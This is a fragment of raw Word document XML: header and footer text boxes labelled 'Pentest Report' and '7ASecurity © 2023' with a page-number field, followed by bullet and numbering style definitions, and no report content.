                              <w:sz w:val="24"/>
                            </w:rPr>
                            <w:fldChar w:fldCharType="begin"/>
                          </w:r>
                          <w:r>
                            <w:rPr>
                              <w:spacing w:val="-5"/>
                              <w:sz w:val="24"/>
                            </w:rPr>
                            <w:instrText> PAGE </w:instrText>
                          </w:r>
                          <w:r>
                            <w:rPr>
                              <w:spacing w:val="-5"/>
                              <w:sz w:val="24"/>
                            </w:rPr>
                            <w:fldChar w:fldCharType="separate"/>
                          </w:r>
                          <w:r>
                            <w:rPr>
                              <w:spacing w:val="-5"/>
                              <w:sz w:val="24"/>
                            </w:rPr>
                            <w:t>100</w:t>
                          </w:r>
                          <w:r>
                            <w:rPr>
                              <w:spacing w:val="-5"/>
                              <w:sz w:val="24"/>
                            </w:rPr>
                            <w:fldChar w:fldCharType="end"/>
                          </w:r>
                        </w:p>
                      </w:txbxContent>
                    </wps:txbx>
                    <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                      <a:noAutofit/>
                    </wps:bodyPr>
                  </wps:wsp>
                </a:graphicData>
              </a:graphic>
            </wp:anchor>
          </w:drawing>
        </mc:Choice>
        <mc:Fallback>
          <w:pict>
            <v:shape style="position:absolute;margin-left:251pt;margin-top:723.658569pt;width:106.9pt;height:31.3pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-18363392" type="#_x0000_t202" id="docshape5" filled="false" stroked="false">
              <v:textbox inset="0,0,0,0">
                <w:txbxContent>
                  <w:p>
                    <w:pPr>
                      <w:spacing w:before="12"/>
                      <w:ind w:left="0" w:right="0" w:firstLine="0"/>
                      <w:jc w:val="center"/>
                      <w:rPr>
                        <w:b/>
                        <w:sz w:val="24"/>
                      </w:rPr>
                    </w:pPr>
                    <w:hyperlink r:id="rId3">
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:color w:val="1154CC"/>
                          <w:sz w:val="24"/>
                          <w:u w:val="single" w:color="1154CC"/>
                        </w:rPr>
                        <w:t>7ASecurity</w:t>
                      </w:r>
                    </w:hyperlink>
                    <w:r>
                      <w:rPr>
                        <w:b/>
                        <w:color w:val="1154CC"/>
                        <w:sz w:val="24"/>
                      </w:rPr>
                      <w:t> </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:b/>
                        <w:sz w:val="24"/>
                      </w:rPr>
                      <w:t>© </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:b/>
                        <w:spacing w:val="-4"/>
                        <w:sz w:val="24"/>
                      </w:rPr>
                      <w:t>2023</w:t>
                    </w:r>
                  </w:p>
                  <w:p>
                    <w:pPr>
                      <w:spacing w:before="41"/>
                      <w:ind w:left="82" w:right="0" w:firstLine="0"/>
                      <w:jc w:val="center"/>
                      <w:rPr>
                        <w:sz w:val="24"/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:spacing w:val="-5"/>
                        <w:sz w:val="24"/>
                      </w:rPr>
                      <w:fldChar w:fldCharType="begin"/>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:spacing w:val="-5"/>
                        <w:sz w:val="24"/>
                      </w:rPr>
                      <w:instrText> PAGE </w:instrText>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:spacing w:val="-5"/>
                        <w:sz w:val="24"/>
                      </w:rPr>
                      <w:fldChar w:fldCharType="separate"/>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:spacing w:val="-5"/>
                        <w:sz w:val="24"/>
                      </w:rPr>
                      <w:t>100</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:spacing w:val="-5"/>
                        <w:sz w:val="24"/>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4951040">
          <wp:simplePos x="0" y="0"/>
          <wp:positionH relativeFrom="page">
            <wp:posOffset>3457575</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="page">
            <wp:posOffset>0</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="4295775" cy="1133856"/>
          <wp:effectExtent l="0" t="0" r="0" b="0"/>
          <wp:wrapNone/>
          <wp:docPr id="3" name="Image 3"/>
          <wp:cNvGraphicFramePr>
            <a:graphicFrameLocks/>
          </wp:cNvGraphicFramePr>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="3" name="Image 3"/>
                  <pic:cNvPicPr/>
                </pic:nvPicPr>
                <pic:blipFill>
                  <a:blip r:embed="rId1" cstate="print"/>
                  <a:stretch>
                    <a:fillRect/>
                  </a:stretch>
                </pic:blipFill>
                <pic:spPr>
                  <a:xfrm>
                    <a:off x="0" y="0"/>
                    <a:ext cx="4295775" cy="1133856"/>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4951552">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="page">
                <wp:posOffset>901700</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="page">
                <wp:posOffset>167683</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="1470660" cy="252729"/>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1470660" cy="252729"/>
                      </a:xfrm>
                      <a:prstGeom prst="rect">
                        <a:avLst/>
                      </a:prstGeom>
                    </wps:spPr>
                    <wps:txbx>
                      <w:txbxContent>
                        <w:p>
                          <w:pPr>
                            <w:spacing w:before="9"/>
                            <w:ind w:left="20" w:right="0" w:firstLine="0"/>
                            <w:jc w:val="left"/>
                            <w:rPr>
                              <w:b/>
                              <w:sz w:val="32"/>
                            </w:rPr>
                          </w:pPr>
                          <w:r>
                            <w:rPr>
                              <w:b/>
                              <w:color w:val="1B4586"/>
                              <w:sz w:val="32"/>
                            </w:rPr>
                            <w:t>Pentest</w:t>
                          </w:r>
                          <w:r>
                            <w:rPr>
                              <w:b/>
                              <w:color w:val="1B4586"/>
                              <w:spacing w:val="-7"/>
                              <w:sz w:val="32"/>
                            </w:rPr>
                            <w:t> </w:t>
                          </w:r>
                          <w:r>
                            <w:rPr>
                              <w:b/>
                              <w:color w:val="1B4586"/>
                              <w:spacing w:val="-2"/>
                              <w:sz w:val="32"/>
                            </w:rPr>
                            <w:t>Report</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71pt;margin-top:13.203447pt;width:115.8pt;height:19.9pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-18364928" type="#_x0000_t202" id="docshape2" filled="false" stroked="false">
              <v:textbox inset="0,0,0,0">
                <w:txbxContent>
                  <w:p>
                    <w:pPr>
                      <w:spacing w:before="9"/>
                      <w:ind w:left="20" w:right="0" w:firstLine="0"/>
                      <w:jc w:val="left"/>
                      <w:rPr>
                        <w:b/>
                        <w:sz w:val="32"/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:b/>
                        <w:color w:val="1B4586"/>
                        <w:sz w:val="32"/>
                      </w:rPr>
                      <w:t>Pentest</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:b/>
                        <w:color w:val="1B4586"/>
                        <w:spacing w:val="-7"/>
                        <w:sz w:val="32"/>
                      </w:rPr>
                      <w:t> </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:b/>
                        <w:color w:val="1B4586"/>
                        <w:spacing w:val="-2"/>
                        <w:sz w:val="32"/>
                      </w:rPr>
                      <w:t>Report</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4951040">
          <wp:simplePos x="0" y="0"/>
          <wp:positionH relativeFrom="page">
            <wp:posOffset>3457575</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="page">
            <wp:posOffset>0</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="4295775" cy="1133856"/>
          <wp:effectExtent l="0" t="0" r="0" b="0"/>
          <wp:wrapNone/>
          <wp:docPr id="8" name="Image 8"/>
          <wp:cNvGraphicFramePr>
            <a:graphicFrameLocks/>
          </wp:cNvGraphicFramePr>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="8" name="Image 8"/>
                  <pic:cNvPicPr/>
                </pic:nvPicPr>
                <pic:blipFill>
                  <a:blip r:embed="rId1" cstate="print"/>
                  <a:stretch>
                    <a:fillRect/>
                  </a:stretch>
                </pic:blipFill>
                <pic:spPr>
                  <a:xfrm>
                    <a:off x="0" y="0"/>
                    <a:ext cx="4295775" cy="1133856"/>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4951552">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="page">
                <wp:posOffset>901700</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="page">
                <wp:posOffset>167683</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="1470660" cy="252729"/>
              <wp:effectExtent l="0" t="0" r="0" b="0"/>
              <wp:wrapNone/>
              <wp:docPr id="9" name="Textbox 9"/>
              <wp:cNvGraphicFramePr>
                <a:graphicFrameLocks/>
              </wp:cNvGraphicFramePr>
              <a:graphic>
                <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                  <wps:wsp>
                    <wps:cNvPr id="9" name="Textbox 9"/>
                    <wps:cNvSpPr txBox="1"/>
                    <wps:spPr>
                      <a:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="1470660" cy="252729"/>
                      </a:xfrm>
                      <a:prstGeom prst="rect">
                        <a:avLst/>
                      </a:prstGeom>
                    </wps:spPr>
                    <wps:txbx>
                      <w:txbxContent>
                        <w:p>
                          <w:pPr>
                            <w:spacing w:before="9"/>
                            <w:ind w:left="20" w:right="0" w:firstLine="0"/>
                            <w:jc w:val="left"/>
                            <w:rPr>
                              <w:b/>
                              <w:sz w:val="32"/>
                            </w:rPr>
                          </w:pPr>
                          <w:r>
                            <w:rPr>
                              <w:b/>
                              <w:color w:val="1B4586"/>
                              <w:sz w:val="32"/>
                            </w:rPr>
                            <w:t>Pentest</w:t>
                          </w:r>
                          <w:r>
                            <w:rPr>
                              <w:b/>
                              <w:color w:val="1B4586"/>
                              <w:spacing w:val="-7"/>
                              <w:sz w:val="32"/>
                            </w:rPr>
                            <w:t> </w:t>
                          </w:r>
                          <w:r>
                            <w:rPr>
                              <w:b/>
                              <w:color w:val="1B4586"/>
                              <w:spacing w:val="-2"/>
                              <w:sz w:val="32"/>
                            </w:rPr>
                            <w:t>Report</w:t>
                          </w:r>
                        </w:p>
                      </w:txbxContent>
                    </wps:txbx>
                    <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                      <a:noAutofit/>
                    </wps:bodyPr>
                  </wps:wsp>
                </a:graphicData>
              </a:graphic>
            </wp:anchor>
          </w:drawing>
        </mc:Choice>
        <mc:Fallback>
          <w:pict>
            <v:shape style="position:absolute;margin-left:71pt;margin-top:13.203447pt;width:115.8pt;height:19.9pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-18364928" type="#_x0000_t202" id="docshape4" filled="false" stroked="false">
              <v:textbox inset="0,0,0,0">
                <w:txbxContent>
                  <w:p>
                    <w:pPr>
                      <w:spacing w:before="9"/>
                      <w:ind w:left="20" w:right="0" w:firstLine="0"/>
                      <w:jc w:val="left"/>
                      <w:rPr>
                        <w:b/>
                        <w:sz w:val="32"/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:b/>
                        <w:color w:val="1B4586"/>
                        <w:sz w:val="32"/>
                      </w:rPr>
                      <w:t>Pentest</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:b/>
                        <w:color w:val="1B4586"/>
                        <w:spacing w:val="-7"/>
                        <w:sz w:val="32"/>
                      </w:rPr>
                      <w:t> </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:b/>
                        <w:color w:val="1B4586"/>
                        <w:spacing w:val="-2"/>
                        <w:sz w:val="32"/>
                      </w:rPr>
                      <w:t>Report</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31">
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
        <w:spacing w:val="0"/>
        <w:w w:val="100"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
        <w:b w:val="0"/>
        <w:bCs w:val="0"/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:spacing w:val="0"/>
        <w:w w:val="100"/>
        <w:sz w:val="22"/>
        <w:szCs w:val="22"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3000" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="384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20" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6360" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7200" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="8040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="30">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29">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28">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27">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26">
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
        <w:b w:val="0"/>
        <w:bCs w:val="0"/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:spacing w:val="0"/>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25">
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
        <w:b w:val="0"/>
        <w:bCs w:val="0"/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:spacing w:val="0"/>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24">
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
        <w:b w:val="0"/>
        <w:bCs w:val="0"/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:spacing w:val="0"/>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23">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22">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21">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20">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19">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18">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17">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16">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15">
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
        <w:b w:val="0"/>
        <w:bCs w:val="0"/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:spacing w:val="0"/>
        <w:w w:val="100"/>
        <w:sz w:val="22"/>
        <w:szCs w:val="22"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
        <w:b w:val="0"/>
        <w:bCs w:val="0"/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:spacing w:val="0"/>
        <w:w w:val="100"/>
        <w:sz w:val="22"/>
        <w:szCs w:val="22"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3000" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="384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20" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6360" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7200" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="8040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="14">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13">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12">
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
        <w:b w:val="0"/>
        <w:bCs w:val="0"/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:spacing w:val="0"/>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11">
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
        <w:b w:val="0"/>
        <w:bCs w:val="0"/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:spacing w:val="0"/>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10">
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1140" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
        <w:b w:val="0"/>
        <w:bCs w:val="0"/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:spacing w:val="0"/>
        <w:w w:val="100"/>
        <w:sz w:val="22"/>
        <w:szCs w:val="22"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1998" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2856" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3714" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4572" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5430" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6288" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7146" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="8004" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="9">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8">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7">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6">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4">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3">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2">
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440"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2268" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3096" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="392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236" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="8064" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="1">
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
        <w:spacing w:val="0"/>
        <w:w w:val="100"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
        <w:spacing w:val="0"/>
        <w:w w:val="100"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
